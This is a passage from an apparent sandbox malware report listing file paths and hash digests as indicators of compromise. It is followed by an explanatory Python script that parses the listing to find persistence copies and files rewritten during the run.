SHA512 27ba541a466ac7e5005d048c803b8ace84447f30a4c567f36f62db2bce3db68fe303f81b2801fded13ae691b3a3d259c7fe3b181935c1b0b0b432862afb42d93

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_720_POS4.jpg

MD5 bd74a3c50fd08981e89d96859e176d68
SHA1 0a98b96aefe60b96722d587b7c3aabcd15927618
SHA256 ab305218ee0e95fa553885fa52f3a25dcc13b4deade8b7993ccb9f230a272837
SHA512 0704243904abc3691177e34606fe2741945f69cf7ecb898655d98e81b145bf707d20cfa0af01fb3aa1cd170e2f3ce8f625b1612e0fcf5eba01f770617ffc9f1e

C:\ProgramData\yul\logs.dat

MD5 b97beaf3b95f3b354a19a93bdc36bb1a
SHA1 587348dc61688a3537711d9af922527b2813b33a
SHA256 001413fa305b4830a173cdf2ff7eeb26c3615152599aad9c3d01b4011e837469
SHA512 1073b1ef95677eaeccedabcb73eaed26fa7240911bc3cd83e440bdf7a59e5b842f29fcb0e7be6a3e726ee099110d33101f8e4d05e9a2eb618e13cf8786fe0ae0
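The file listing above is flat text: a path, then its MD5/SHA1/SHA256/SHA512 digests, repeated for every file the sandbox saw. Two patterns in it matter more than the individual hashes. The same content turning up under a second path (the sample on the Desktop and the copy written to %APPDATA%\uiVprBevwjFGG.exe carry identical digests) is the persistence copy; the same path listed with different digests (C:\ProgramData\yul\logs.dat appears four times with four different hashes) is a file the malware kept rewriting during the run. The script below is an added example, not tooling from the sandbox vendor or the report: it parses the listing layout shown on this page, rejects digests of the wrong length (a sign the extraction truncated them), drops verbatim repeats, and surfaces both patterns. SAMPLE is a constructed excerpt of five entries copied from the listing, one of them repeated as it is on the page.

```python
"""Parse the flattened 'Files' listing of a sandbox report into IOC records.

Added example for this page, not the sandbox vendor's tooling. It assumes the
layout visible above: a path line followed by MD5/SHA1/SHA256/SHA512 lines.
SAMPLE is a constructed excerpt of five entries copied from the report, one of
them repeated verbatim as it is on the page.
"""
import re
from collections import defaultdict, namedtuple

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
FileRecord = namedtuple("FileRecord", "path md5 sha1 sha256 sha512")

def parse_file_listing(text):
    """Build records; reject digests that extraction truncated or dropped."""
    records, path, hashes = [], None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if m is None:  # any non-hash line (path, memory/... entry) starts a record
            if hashes:
                raise ValueError(f"incomplete hash set for {path!r}")
            path = line
            continue
        algo, digest = m.group(1), m.group(2).lower()
        if path is None:
            raise ValueError(f"{algo} line before any path")
        if len(digest) != HASH_LEN[algo]:
            raise ValueError(f"{algo} for {path!r} has {len(digest)} hex chars")
        hashes[algo] = digest
        if len(hashes) == 4:  # HASH_LEN order matches the namedtuple fields
            records.append(FileRecord(path, *(hashes[k] for k in HASH_LEN)))
            path, hashes = None, {}
    if hashes:
        raise ValueError(f"listing ended mid-record for {path!r}")
    return records

def dedupe(records):
    """Drop verbatim repeats (same path and digests), keeping listing order."""
    return list(dict.fromkeys(records))

def copies_by_hash(records):
    """SHA256 -> paths for content seen under more than one path, e.g. a
    sample that re-creates itself under %APPDATA% for persistence."""
    paths = defaultdict(list)
    for r in dedupe(records):
        if r.path not in paths[r.sha256]:
            paths[r.sha256].append(r.path)
    return {h: p for h, p in paths.items() if len(p) > 1}

def rewritten_paths(records):
    """path -> SHA256s (listing order) for a path hashed with different
    content, e.g. a log the malware keeps appending to during the run."""
    digests = defaultdict(list)
    for r in dedupe(records):
        if r.sha256 not in digests[r.path]:
            digests[r.path].append(r.sha256)
    return {p: h for p, h in digests.items() if len(h) > 1}

# Constructed excerpt of the page's listing (blank lines between records are
# optional for the parser, so they are omitted here to keep the sample short).
SAMPLE = r"""
C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe
MD5 cc1813159fd550c85aae1423853f3307
SHA1 020f12dd4aa5a90971c350f447cb55a3640052ea
SHA256 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8
SHA512 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187
C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe
MD5 cc1813159fd550c85aae1423853f3307
SHA1 020f12dd4aa5a90971c350f447cb55a3640052ea
SHA256 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8
SHA512 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187
C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe
MD5 cc1813159fd550c85aae1423853f3307
SHA1 020f12dd4aa5a90971c350f447cb55a3640052ea
SHA256 84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8
SHA512 95dfde562904136a3c8e2bbe69ea62bea7d5aa4659c186b16faec46af395298c38aa29995e6f0101031f633b89ec381da8179530d9858d391ecc3785e6438187
C:\ProgramData\yul\logs.dat
MD5 a1b6bd2a98f951e5c37e51937f98fa6b
SHA1 0579fcfef9fd54ee63182e5e6394854c90a3be22
SHA256 e70c85cdd2c9d7a208542a65c3143530747e785adeb5b3ff892c164224392b63
SHA512 e641e8b9046b85bb2400c8883c468fcd30b83e3dc5b1219472fd248c6d951d7ef86dc69a63bf120acfe872220411955a6c0d66495a18100402b4f20d3ea704cc
C:\ProgramData\yul\logs.dat
MD5 b0b45f6d418596b2ab5f132e05cfb376
SHA1 961ef514cdd54d6bc110d15f52598738924d4a2a
SHA256 bfd89af438a4d3217fab60f0968b2e48a907149bde21791e3dc291de912e99dc
SHA512 1e5e3e9ca6aab7c2e8e893fd9477e8dadc254b29eb6c3ebbc604a30d2e2cabc655785b52336435fe33349fbd23957295f417ecde2d428740404ac50685a3ca3b
"""

if __name__ == "__main__":
    recs = parse_file_listing(SAMPLE)
    print(len(recs), "records,", len(dedupe(recs)), "after dropping repeats")
    print("same content under several paths:", copies_by_hash(recs))
    print("paths rewritten during the run:", rewritten_paths(recs))
```

Running it on the excerpt reports five records, four once repeats are dropped, one SHA256 shared by the Desktop sample and the %APPDATA% copy, and one path (logs.dat) with two distinct digests. Fed the whole listing, the same two functions give the persistence copies to hunt for on other hosts and the files worth pulling as evidence of runtime activity, while the length check catches any digest a copy-paste or HTML extraction has cut short.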